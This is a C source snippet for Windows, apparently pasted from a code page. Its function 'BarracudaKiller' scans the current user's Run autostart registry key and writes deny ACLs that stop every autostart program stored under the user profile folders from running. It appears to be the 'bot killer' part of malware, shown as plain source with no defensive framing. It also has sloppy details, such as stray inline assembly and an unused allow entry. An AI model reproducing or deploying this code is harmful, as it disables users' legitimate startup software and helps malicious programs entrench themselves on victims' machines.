1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76
|
#include <Windows.h>
#include <Aclapi.h>
bool SetFilePrivileges(__in wchar_t* m_pwszFilePathName, __in DWORD m_dwPermissions, __in bool m_bDenyOrNot) {
if ( m_pwszFilePathName == 0 || lstrlenW(m_pwszFilePathName) < 1 )
return false;
PACL m_paDACL = 0;
EXPLICIT_ACCESS_A m_stDeny = { 0 };
EXPLICIT_ACCESS_A m_stAllow = { 0 };
DWORD m_dwError = 0;
BuildExplicitAccessWithNameA(&m_stDeny, "CURRENT_USER", m_dwPermissions, (m_bDenyOrNot)?DENY_ACCESS:GRANT_ACCESS, NO_INHERITANCE);
// Prepare ACL
if ( (m_dwError = SetEntriesInAclA(1, &m_stDeny, 0, &m_paDACL)) != ERROR_SUCCESS )
return false;
// Set new DACL
if ( (m_dwError = SetNamedSecurityInfoW(m_pwszFilePathName, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, m_paDACL, NULL)) != ERROR_SUCCESS ) {
LocalFree(m_paDACL);
return false;
}
return true;
}
int BarracudaKiller()
{
wchar_t m_wszBarracuda[MAX_PATH];
wchar_t m_wszUsers[MAX_PATH];
wchar_t m_wszAllUsers[MAX_PATH];
wchar_t m_wszValueName[256];
DWORD m_dwType = REG_SZ;
DWORD m_dwSize = _countof(m_wszBarracuda);
DWORD m_dwNameLength = _countof(m_wszValueName);
DWORD m_dwNumWrote = 0;
HKEY m_hKey = 0;
HANDLE m_hFile = 0;
UINT i = 0;
// Initialize
memset(m_wszBarracuda, 0, sizeof(m_wszBarracuda));
memset(m_wszValueName, 0, sizeof(m_wszValueName));
memset(m_wszUsers, 0, sizeof(m_wszUsers));
memset(m_wszAllUsers, 0, sizeof(m_wszAllUsers));
if ( ExpandEnvironmentStringsW(L"%USERPROFILE%", m_wszUsers, _countof(m_wszUsers) - 1) == NULL )
_asm mov eax , 0
else
CharLowerBuffW(m_wszUsers, _countof(m_wszUsers));
if ( ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%", m_wszAllUsers, _countof(m_wszAllUsers) - 1) == 0 )
_asm mov eax , 0
else
CharLowerBuffW(m_wszAllUsers, _countof(m_wszAllUsers));
if ( RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0, KEY_QUERY_VALUE, &m_hKey) == ERROR_SUCCESS ) {
while ( RegEnumValueW(m_hKey, i++, m_wszValueName, &m_dwNameLength, 0 , &m_dwType, (LPBYTE)m_wszBarracuda, &m_dwSize) == ERROR_SUCCESS ) {
CharLowerBuffW(m_wszBarracuda, (m_dwSize / 2));
if ( lstrlenW(m_wszBarracuda) != 0 && (wcsstr(m_wszBarracuda, m_wszUsers) != 0 || wcsstr(m_wszBarracuda, m_wszAllUsers) != 0) &&
GetFileAttributesW(m_wszBarracuda) != INVALID_FILE_ATTRIBUTES ) {
SetFilePrivileges(m_wszBarracuda, 0x00040021|FILE_WRITE_ATTRIBUTES, true);
}
m_dwNameLength = _countof(m_wszValueName);
m_dwSize = _countof(m_wszBarracuda);
}
}
return 0;
}
|